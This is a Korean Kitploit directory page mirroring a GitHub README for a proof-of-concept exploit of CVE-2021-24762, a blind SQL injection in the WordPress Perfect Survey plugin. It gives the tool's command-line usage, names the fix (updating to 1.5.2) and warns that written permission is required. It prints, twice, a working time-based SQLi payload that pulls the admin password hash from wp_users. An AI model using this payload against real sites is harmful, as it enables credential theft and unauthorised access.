Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Exploit_CVE-2021-24762 — 이 저장소는 CVE-2021-24762에 대한 익스플로잇을 보여줍니다. 기본 구성에서 관리자 비밀번호를 추출하는 블라인드 SQLi 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/c4cnm/exploit_cve-2021-24762
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubc4cnm/exploit_cve-2021-24762

Exploit_CVE-2021-24762

이 저장소는 CVE-2021-24762에 대한 익스플로잇을 보여줍니다. 기본 구성에서 관리자 비밀번호를 추출하는 블라인드 SQLi 익스플로잇입니다.

저장소 보기
110개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

exploit_cve-2021-24762

이 저장소는 CVE-2021-24762에 대한 익스플로잇을 보여줍니다. 기본 구성에서 관리자(admin) 비밀번호를 추출하는 블라인드 SQL 인젝션(Blind SQLi) 익스플로잇입니다.

랩 실습 중 PerfectSurvey 플러그인이 설치된 WordPress 기반 환경에서 SQL 취약점에 막혔습니다. 제가 찾은 유일한 PoC는 sqlmap 기반이었고, 제가 작업 중이던 랩에서는 제대로 작동하지 않았습니다(추가적인 문제가 많았습니다. 예: 애플리케이션이 404를 반환하거나, 타임아웃이 너무 크게 변동하거나, 기타 문제들). 그래서 이 랩을 공격하기 위해 이 도구를 만들었습니다.

목표

  • 이 PoC는 WordPress 플러그인 Perfect Survey와 관련된 CVE-2021-24762를 익스플로잇합니다. 이 익스플로잇은 SLEEP을 사용한 SQL 인젝션을 기반으로 하며, 'admin' 사용자의 비밀번호 해시를 획득합니다. 이 사용자는 WordPress 환경에서 기본 사용자입니다.
  • 작동 조건: Perfect Survey 플러그인 버전 < 1.5.2.

영향 및 심각도

  • CVE-2021-24762: [CVSS 9.8 (치명적)]
  • 영향: 기밀성, 무결성, 가용성, 무단 접근.

환경

  • 소프트웨어 요구 사항: Python3.

사용 방법

root@kitploit:~
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
  1. Python 스크립트는 위의 매개변수를 전달받습니다. 전달되지 않은 경우 기본값으로 실행됩니다.

  2. 이상적으로는 최소한 URL을 전달해야 합니다. -u 또는 --url로 지정하세요. 다른 매개변수는 기본값으로도 동작할 것입니다.

  3. 기본 구성에서는 admin 사용자의 비밀번호 해시를 가져옵니다. 이 구성은 payload 변수의 user_login 값에 적용됩니다: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

    다른 사용자의 해시를 찾아야 하는 경우, "0x61646d696e"(admin)을 필요에 따라 변경하세요.

위험 및 제한 사항

  • 제한 사항: 현재 구성에서 이 PoC는 기본 데이터베이스 구조를 가진 WordPress의 비밀번호 해시만 획득할 수 있습니다. 수정된 환경을 마주한 경우 다음 payload를 변경해야 합니다: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

완화 및 해결 방안 (권장 사항)

  • 완화 권장 사항: 플러그인을 버전 1.5.2 이상으로 업데이트하세요.
  • 참고 자료:
    • https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    • https://www.getperfectsurvey.com/

경고 및 승인

제한된 사용 — 이 저장소는 윤리적이고 책임 있는 사용만을 위한 민감한 콘텐츠를 포함하고 있습니다. 테스트 대상 시스템 소유자의 서면 허가를 반드시 받아야 합니다. 이 범위를 벗어난 사용은 허용되지 않으며, 그 책임은 사용자에게 있습니다(감옥에 가고 싶으십니까?).

저장소 구조

  • exploit_cve-2021-24762 — 익스플로잇.
  • README.ME — 이 파일.

변경 로그

2025-10-10 — c4cnm — Creation and initial modifications

연락처

  • 작성자: Red Team CAIS:/Matheus Camargo (c4cnm), [email protected].

라이선스

GNU General Public License v3 (GPL)

도구 다운로드